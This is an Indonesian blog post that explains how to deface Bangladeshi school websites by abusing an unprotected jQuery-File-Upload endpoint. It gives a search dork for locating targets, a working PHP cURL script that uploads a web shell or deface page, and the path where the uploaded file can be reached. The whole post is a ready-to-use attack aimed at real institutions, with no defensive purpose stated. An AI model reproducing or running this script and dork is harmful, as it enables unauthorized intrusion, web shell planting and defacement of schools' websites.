Saturday, 30 April 2016

Deface website sekolah Bangladesh

hallo.

kali ini ane pengen share cara deface school Bangladesh.
ya kyk bug balitbang lah kalo di indo.

Bugnya ada di plugin jquery-file-upload.
yaudah langsung aja.

dork: Developed by exdmania

script:

<?php
$file = "kkk.htm"; //shell ataupun script deface
$post = array("files[]" => "@$file",
);
$ch2 = curl_init ("http://site.com/assets/super_admin/vendor/jquery-file-upload/server/php/");
curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch2, CURLOPT_POST, 1);
curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch2);
echo $data."\n\n\n";
?>
POC:

hasil:
/assets/super_admin/vendor/jquery-file-upload/server/php/files/

keep share :)

2 comments:

  1. This comment has been removed by the author.

    ReplyDelete
  2. This comment has been removed by the author.

    ReplyDelete